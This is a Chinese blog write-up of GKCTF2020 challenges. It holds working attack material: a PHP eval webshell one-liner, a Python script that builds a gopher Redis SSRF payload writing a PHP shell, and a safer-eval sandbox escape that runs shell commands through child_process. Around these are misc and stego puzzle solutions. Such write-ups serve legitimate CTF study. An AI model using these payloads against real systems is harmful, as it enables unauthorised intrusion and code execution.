<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yuhaojiang.gitee.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="前言抽空复现一下 老八小超市打开之后是个shopxo的商城，用默认后台账号密码登录，成功进入后台。 下载免费的主题，把一句话木马放进去。 安装主题，即可getshell 参考：传送门 然后在假flag告知下得知真flag在&#x2F;root目录下，但是因为当前是www-data用户是没有权限访问&#x2F;root目录的。 然后在根目录下发现auto.sh     输入ps -ef发现auto.sh是root权限执">
<meta property="og:type" content="article">
<meta property="og:title" content="GKCTF2020">
<meta property="og:url" content="https://yuhaojiang.gitee.io/2020/06/01/GKCTF%202020/index.html">
<meta property="og:site_name" content="kawhi的博客">
<meta property="og:description" content="前言抽空复现一下 老八小超市打开之后是个shopxo的商城，用默认后台账号密码登录，成功进入后台。 下载免费的主题，把一句话木马放进去。 安装主题，即可getshell 参考：传送门 然后在假flag告知下得知真flag在&#x2F;root目录下，但是因为当前是www-data用户是没有权限访问&#x2F;root目录的。 然后在根目录下发现auto.sh     输入ps -ef发现auto.sh是root权限执">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200526220703847.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200526220146582.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200526220613995.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200526225116128.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200526225159436.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200526225043564.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200526231215560.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200526231327900.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200527114207278.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200527114920600.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200601151723022.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200601172717498.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200601182225212.png">
<meta property="og:image" content="http://img.kawhi.xyz/image-20200601185426514.png">
<meta property="article:published_time" content="2020-05-31T16:00:00.000Z">
<meta property="article:modified_time" content="2020-10-16T03:56:20.791Z">
<meta property="article:author" content="kawhi">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://img.kawhi.xyz/image-20200526220703847.png">

<link rel="canonical" href="https://yuhaojiang.gitee.io/2020/06/01/GKCTF%202020/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>GKCTF2020 | kawhi的博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">kawhi的博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://yuhaojiang.gitee.io/2020/06/01/GKCTF%202020/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="http://yuhaojiang.gitee.io/picture/Blog头像.jpg">
      <meta itemprop="name" content="kawhi">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="kawhi的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          GKCTF2020
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-06-01 00:00:00" itemprop="dateCreated datePublished" datetime="2020-06-01T00:00:00+08:00">2020-06-01</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-10-16 11:56:20" itemprop="dateModified" datetime="2020-10-16T11:56:20+08:00">2020-10-16</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF%E6%AF%94%E8%B5%9B/" itemprop="url" rel="index"><span itemprop="name">CTF比赛</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a><strong>前言</strong></h4><p>抽空复现一下</p>
<h4 id="老八小超市"><a href="#老八小超市" class="headerlink" title="老八小超市"></a><strong>老八小超市</strong></h4><p>打开之后是个shopxo的商城，用默认后台账号密码登录，成功进入后台。</p>
<p>下载免费的主题，把一句话木马放进去。</p>
<p>安装主题，即可getshell</p>
<p>参考：<a class="foo" href="http://www.nctry.com/1660.html" target="_blank">传送门</a></p>
<p>然后在假flag告知下得知真flag在/root目录下，但是因为当前是www-data用户是没有权限访问/root目录的。</p>
<p>然后在根目录下发现auto.sh</p>
<img src="http://img.kawhi.xyz/image-20200526220703847.png" style="high:80%;width:80%;" />

<img src="http://img.kawhi.xyz/image-20200526220146582.png" style="high:80%;width:80%;" />

<p>输入ps -ef发现auto.sh是root权限执行的。</p>
<p>然后在/var/mail/makeflaghint.py修改一下代码，加入两行内容读取/root/flag到/flag.hint</p>
<img src="http://img.kawhi.xyz/image-20200526220613995.png" style="high:80%;width:80%;" />

<p>然后在flag.hint里面成功读取flag。</p>
<h4 id="CheckIN"><a href="#CheckIN" class="headerlink" title="CheckIN"></a><strong>CheckIN</strong></h4><p>源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;title&gt;Check_In&lt;/title&gt;</span><br><span class="line">&lt;?php </span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ClassName</span></span></span><br><span class="line">&#123;</span><br><span class="line">        public $code = null;</span><br><span class="line">        public $decode = null;</span><br><span class="line">        function __construct()</span><br><span class="line">        &#123;</span><br><span class="line">                $this-&gt;code = @$this-&gt;x()[&#x27;Ginkgo&#x27;];</span><br><span class="line">                $this-&gt;decode = @base64_decode( $this-&gt;code );</span><br><span class="line"><span class="meta">                @Eval($this-&gt;decode);</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        public function x()</span><br><span class="line">        &#123;</span><br><span class="line">                <span class="keyword">return</span> $_REQUEST;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line">new ClassName(); </span><br></pre></td></tr></table></figure>

<p>phpinfo();</p>
<p>base64加密为 cGhwaW5mbygpOw== </p>
<p>回显成功，利用一句话连接 </p>
<p>eval($_POST[cmd]);</p>
<p>base64加密得ZXZhbCgkX1BPU1RbY21kXSk7</p>
<p>在根目录看到一个flag，但是没有权限查看，还有一个readflag文件。</p>
<p>但是发现蚁剑终端并不能用，回到phpinfo()发现很多方法被禁用。</p>
<img src="http://img.kawhi.xyz/image-20200526225116128.png" style="high:80%;width:80%;" />

<p>过滤了很多function，想到绕过disable_functions，上传一个文件使其执行任意命令，exp地址：<a class="foo" href="https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php" target="_blank">传送门</a></p>
<p>在这里稍微改一下。</p>
<img src="http://img.kawhi.xyz/image-20200526225159436.png" style="high:80%;width:80%;" />

<p>然后在页面就可以得到flag。</p>
<img src="http://img.kawhi.xyz/image-20200526225043564.png" style="high:80%;width:80%;" />

<h4 id="cve版签到"><a href="#cve版签到" class="headerlink" title="cve版签到"></a><strong>cve版签到</strong></h4><p>通过%00截断可以让<code>get_headers()</code>请求到错误的主机，于是请求到本地。</p>
<img src="http://img.kawhi.xyz/image-20200526231215560.png" style="high:80%;width:80%;" />

<p>再根据提示把后缀改为123</p>
<img src="http://img.kawhi.xyz/image-20200526231327900.png" style="high:80%;width:80%;" />

<p>即可得到flag。</p>
<h4 id="EZ三剑客-EzWeb"><a href="#EZ三剑客-EzWeb" class="headerlink" title="EZ三剑客-EzWeb"></a><strong>EZ三剑客-EzWeb</strong></h4><p>访问?secret得到本机ip</p>
<img src="http://img.kawhi.xyz/image-20200527114207278.png" style="high:80%;width:80%;" />

<p>写个脚本探测内网</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">ip = <span class="string">&#x27;173.17.51.&#123;&#125;&#x27;</span></span><br><span class="line">url = <span class="string">&#x27;http://ac0d31a7-5126-4f26-a7ec-b38aceea896a.node3.buuoj.cn&#x27;</span></span><br><span class="line">temp = <span class="string">&quot;&#123;0&#125;/index.php?url=&#123;1&#125;&amp;&amp;submit=提交&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">255</span>):</span><br><span class="line">    u = temp.format(url, ip.format(i))</span><br><span class="line">    resp = requests.get(u)</span><br><span class="line">    <span class="keyword">if</span> len(resp.text) != <span class="number">421</span>:</span><br><span class="line">    	print(i)</span><br></pre></td></tr></table></figure>

<p>跑出结果4 5 6 7 10 11</p>
<p>一个一个试，11的时候给出了提示。</p>
<p>然后用burp爆破端口</p>
<img src="http://img.kawhi.xyz/image-20200527114920600.png" style="high:80%;width:80%;" />

<p>payloads选numbers爆破1到65535端口，线程选1。</p>
<p>爆破出结果6374。</p>
<p>因为输入url这里只限制了<code>file://</code>，没有ban掉<code>gopher://</code>，很容易想到是Redis SSRF getshell。</p>
<p>直接用exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line">protocol=<span class="string">&quot;gopher://&quot;</span></span><br><span class="line">ip=<span class="string">&quot;173.17.51.11&quot;</span></span><br><span class="line">port=<span class="string">&quot;6379&quot;</span></span><br><span class="line">shell=<span class="string">&quot;\n\n&lt;?php system(\&quot;cat /flag\&quot;);?&gt;\n\n&quot;</span></span><br><span class="line">filename=<span class="string">&quot;shell.php&quot;</span></span><br><span class="line">path=<span class="string">&quot;/var/www/html&quot;</span></span><br><span class="line">passwd=<span class="string">&quot;&quot;</span></span><br><span class="line">cmd=[<span class="string">&quot;flushall&quot;</span>,</span><br><span class="line">	 <span class="string">&quot;set 1 &#123;&#125;&quot;</span>.format(shell.replace(<span class="string">&quot; &quot;</span>,<span class="string">&quot;$&#123;IFS&#125;&quot;</span>)),</span><br><span class="line">	 <span class="string">&quot;config set dir &#123;&#125;&quot;</span>.format(path),</span><br><span class="line">	 <span class="string">&quot;config set dbfilename &#123;&#125;&quot;</span>.format(filename),</span><br><span class="line">	 <span class="string">&quot;save&quot;</span></span><br><span class="line">	 ]</span><br><span class="line"><span class="keyword">if</span> passwd:</span><br><span class="line">	cmd.insert(<span class="number">0</span>,<span class="string">&quot;AUTH &#123;&#125;&quot;</span>.format(passwd))</span><br><span class="line">payload=protocol+ip+<span class="string">&quot;:&quot;</span>+port+<span class="string">&quot;/_&quot;</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">redis_format</span>(<span class="params">arr</span>):</span></span><br><span class="line">	CRLF=<span class="string">&quot;\r\n&quot;</span></span><br><span class="line">	redis_arr = arr.split(<span class="string">&quot; &quot;</span>)</span><br><span class="line">	cmd=<span class="string">&quot;&quot;</span></span><br><span class="line">	cmd+=<span class="string">&quot;*&quot;</span>+str(len(redis_arr))</span><br><span class="line">	<span class="keyword">for</span> x <span class="keyword">in</span> redis_arr:</span><br><span class="line">		cmd+=CRLF+<span class="string">&quot;$&quot;</span>+str(len((x.replace(<span class="string">&quot;$&#123;IFS&#125;&quot;</span>,<span class="string">&quot; &quot;</span>))))+CRLF+x.replace(<span class="string">&quot;$&#123;IFS&#125;&quot;</span>,<span class="string">&quot; &quot;</span>)</span><br><span class="line">	cmd+=CRLF</span><br><span class="line">	<span class="keyword">return</span> cmd</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">	<span class="keyword">for</span> x <span class="keyword">in</span> cmd:</span><br><span class="line">		payload += urllib.quote(redis_format(x))</span><br><span class="line">	print(payload)</span><br></pre></td></tr></table></figure>

<p>payload为：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://<span class="number">173.17</span><span class="number">.51</span><span class="number">.11</span>:<span class="number">6379</span>/_%<span class="number">2</span>A1%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">248</span>%<span class="number">0</span>D%<span class="number">0</span>Aflushall%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">2</span>A3%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">243</span>%<span class="number">0</span>D%<span class="number">0</span>Aset%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">241</span>%<span class="number">0</span>D%<span class="number">0</span>A1%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">2432</span>%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">0</span>A%<span class="number">0</span>A%<span class="number">3</span>C%<span class="number">3</span>Fphp%<span class="number">20</span>system%<span class="number">28</span>%<span class="number">22</span>cat%<span class="number">20</span>/flag%<span class="number">22</span>%<span class="number">29</span>%<span class="number">3</span>B%<span class="number">3</span>F%<span class="number">3</span>E%<span class="number">0</span>A%<span class="number">0</span>A%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">2</span>A4%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">246</span>%<span class="number">0</span>D%<span class="number">0</span>Aconfig%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">243</span>%<span class="number">0</span>D%<span class="number">0</span>Aset%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">243</span>%<span class="number">0</span>D%<span class="number">0</span>Adir%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">2413</span>%<span class="number">0</span>D%<span class="number">0</span>A/var/www/html%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">2</span>A4%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">246</span>%<span class="number">0</span>D%<span class="number">0</span>Aconfig%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">243</span>%<span class="number">0</span>D%<span class="number">0</span>Aset%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">2410</span>%<span class="number">0</span>D%<span class="number">0</span>Adbfilename%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">249</span>%<span class="number">0</span>D%<span class="number">0</span>Ashell.php%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">2</span>A1%<span class="number">0</span>D%<span class="number">0</span>A%<span class="number">244</span>%<span class="number">0</span>D%<span class="number">0</span>Asave%<span class="number">0</span>D%<span class="number">0</span>A</span><br></pre></td></tr></table></figure>

<p>直接打进去。</p>
<p>在根目录下生成个文件shell.php，访问即可得到flag。</p>
<h4 id="EZ三剑客-EzNode"><a href="#EZ三剑客-EzNode" class="headerlink" title="EZ三剑客-EzNode"></a><strong>EZ三剑客-EzNode</strong></h4><p>源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">const express = require(<span class="string">&#x27;express&#x27;</span>);</span><br><span class="line">const bodyParser = require(<span class="string">&#x27;body-parser&#x27;</span>);</span><br><span class="line"></span><br><span class="line">const saferEval = require(<span class="string">&#x27;safer-eval&#x27;</span>); // <span class="number">2019.7</span>/WORKER1 找到一个很棒的库</span><br><span class="line"></span><br><span class="line">const fs = require(<span class="string">&#x27;fs&#x27;</span>);</span><br><span class="line"></span><br><span class="line">const app = express();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app.use(bodyParser.urlencoded(&#123; extended: false &#125;));</span><br><span class="line">app.use(bodyParser.json());</span><br><span class="line"></span><br><span class="line">// <span class="number">2020.1</span>/WORKER2 老板说为了后期方便优化</span><br><span class="line">app.use((req, res, next) =&gt; &#123;</span><br><span class="line">  <span class="keyword">if</span> (req.path === <span class="string">&#x27;/eval&#x27;</span>) &#123;</span><br><span class="line">    let delay = <span class="number">60</span> * <span class="number">1000</span>;</span><br><span class="line">    console.log(delay);</span><br><span class="line">    <span class="keyword">if</span> (Number.isInteger(parseInt(req.query.delay))) &#123;</span><br><span class="line">      delay = Math.max(delay, parseInt(req.query.delay));</span><br><span class="line">    &#125;</span><br><span class="line">    const t = setTimeout(() =&gt; next(), delay);</span><br><span class="line">    // <span class="number">2020.1</span>/WORKER3 老板说让我优化一下速度，我就直接这样写了，其他人写了啥关我p事</span><br><span class="line">    setTimeout(() =&gt; &#123;</span><br><span class="line">      clearTimeout(t);</span><br><span class="line">      console.log(<span class="string">&#x27;timeout&#x27;</span>);</span><br><span class="line">      <span class="keyword">try</span> &#123;</span><br><span class="line">        res.send(<span class="string">&#x27;Timeout!&#x27;</span>);</span><br><span class="line">      &#125; catch (e) &#123;</span><br><span class="line"></span><br><span class="line">      &#125;</span><br><span class="line">    &#125;, <span class="number">1000</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    next();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.post(<span class="string">&#x27;/eval&#x27;</span>, function (req, res) &#123;</span><br><span class="line">  let response = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">  <span class="keyword">if</span> (req.body.e) &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">      response = saferEval(req.body.e);</span><br><span class="line">    &#125; catch (e) &#123;</span><br><span class="line">      response = <span class="string">&#x27;Wrong Wrong Wrong!!!!&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  res.send(String(response));</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">// <span class="number">2019.10</span>/WORKER1 老板娘说她要看到我们的源代码，用行数计算KPI</span><br><span class="line">app.get(<span class="string">&#x27;/source&#x27;</span>, function (req, res) &#123;</span><br><span class="line">  res.set(<span class="string">&#x27;Content-Type&#x27;</span>, <span class="string">&#x27;text/javascript;charset=utf-8&#x27;</span>);</span><br><span class="line">  res.send(fs.readFileSync(<span class="string">&#x27;./index.js&#x27;</span>));</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">// <span class="number">2019.12</span>/WORKER3 为了方便我自己查看版本，加上这个接口</span><br><span class="line">app.get(<span class="string">&#x27;/version&#x27;</span>, function (req, res) &#123;</span><br><span class="line">  res.set(<span class="string">&#x27;Content-Type&#x27;</span>, <span class="string">&#x27;text/json;charset=utf-8&#x27;</span>);</span><br><span class="line">  res.send(fs.readFileSync(<span class="string">&#x27;./package.json&#x27;</span>));</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">&#x27;/&#x27;</span>, function (req, res) &#123;</span><br><span class="line">  res.set(<span class="string">&#x27;Content-Type&#x27;</span>, <span class="string">&#x27;text/html;charset=utf-8&#x27;</span>);</span><br><span class="line">  res.send(fs.readFileSync(<span class="string">&#x27;./index.html&#x27;</span>))</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.listen(80, &#x27;0.0.0.0&#x27;, () =&gt; &#123;</span><br><span class="line">  console.log(<span class="string">&#x27;Start listening&#x27;</span>)</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>分析：</p>
<ul>
<li><strong>setTimeout</strong> </li>
</ul>
<p>整数溢出，Infinity或者 大于 2147483647</p>
<p>然后get传参即可。</p>
<ul>
<li><strong>safeeval</strong></li>
</ul>
<p>RCE地址：<a class="foo" href="https://github.com/commenthol/safer-eval/issues/10" target="_blank">传送门</a></p>
<p>payload(post提交)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">e=setInterval.constructor(<span class="string">&#x27;return process&#x27;</span>)().mainModule.require(<span class="string">&#x27;child_process&#x27;</span>).execSync(<span class="string">&#x27;cat /flag&#x27;</span>).toString();</span><br></pre></td></tr></table></figure>

<img src="http://img.kawhi.xyz/image-20200601151723022.png" style="high:80%;width:80%;" />

<h4 id="Pokémon"><a href="#Pokémon" class="headerlink" title="Pokémon"></a><strong>Pokémon</strong></h4><p>下载得到一个gba文件，用<code>VisualBoyAdvance</code>打开，玩游戏即可得到flag。</p>
<h4 id="code-obfuscation"><a href="#code-obfuscation" class="headerlink" title="code obfuscation"></a><strong>code obfuscation</strong></h4><p>得到一张残缺的二维码图片</p>
<p>然后在这个网站上面修补：<a class="foo" href="https://merricx.github.io/qrazybox/" target="_blank">传送门</a></p>
<p>或者使用ps修复也行</p>
<img src="http://img.kawhi.xyz/image-20200601172717498.png" style="high:50%;width:50%;" />

<p>扫二维码得gkctf，再base58解密得到压缩包密码CfjxaPF。</p>
<h4 id="Harley-Quinn"><a href="#Harley-Quinn" class="headerlink" title="Harley Quinn"></a><strong>Harley Quinn</strong></h4><p>得到一段音频，最后面有拨号音，剪切之后丢到dtmf里面。</p>
<p>解得#222833344477773338866# 根据hint九键输出ctfisfun。</p>
<p>下载hint所说的软件, FreeFileCamouflage。</p>
<img src="http://img.kawhi.xyz/image-20200601182225212.png" style="high:80%;width:80%;" />

<p>输入密钥和图片地址得到flag。</p>
<h4 id="Sail-a-boat-down-the-river"><a href="#Sail-a-boat-down-the-river" class="headerlink" title="Sail a boat down the river"></a><strong>Sail a boat down the river</strong></h4><p>下载得一个flag.mp4有一帧是二维码，然后扫描得到一个网盘链接，但是没有提取码，根据视频里的摄像头闪光长短转换成<code>摩斯密码</code>。解码得<code>yw8g</code>。</p>
<p>得到</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0</span> <span class="number">8</span> <span class="number">1</span> <span class="number">7</span> <span class="number">4</span> <span class="number">0</span> <span class="number">0</span> <span class="number">0</span> <span class="number">0</span></span><br><span class="line"><span class="number">3</span> <span class="number">0</span> <span class="number">2</span> <span class="number">0</span> <span class="number">6</span> <span class="number">8</span> <span class="number">0</span> <span class="number">0</span> <span class="number">0</span></span><br><span class="line"><span class="number">4</span> <span class="number">0</span> <span class="number">6</span> <span class="number">5</span> <span class="number">0</span> <span class="number">0</span> <span class="number">8</span> <span class="number">2</span> <span class="number">0</span></span><br><span class="line"><span class="number">0</span> <span class="number">3</span> <span class="number">0</span> <span class="number">0</span> <span class="number">0</span> <span class="number">0</span> <span class="number">0</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line"><span class="number">7</span> <span class="number">0</span> <span class="number">4</span> <span class="number">3</span> <span class="number">0</span> <span class="number">9</span> <span class="number">2</span> <span class="number">0</span> <span class="number">1</span></span><br><span class="line"><span class="number">1</span> <span class="number">2</span> <span class="number">0</span> <span class="number">0</span> <span class="number">0</span> <span class="number">0</span> <span class="number">0</span> <span class="number">4</span> <span class="number">0</span></span><br><span class="line"><span class="number">0</span> <span class="number">5</span> <span class="number">9</span> <span class="number">0</span> <span class="number">0</span> <span class="number">4</span> <span class="number">1</span> <span class="number">0</span> <span class="number">8</span></span><br><span 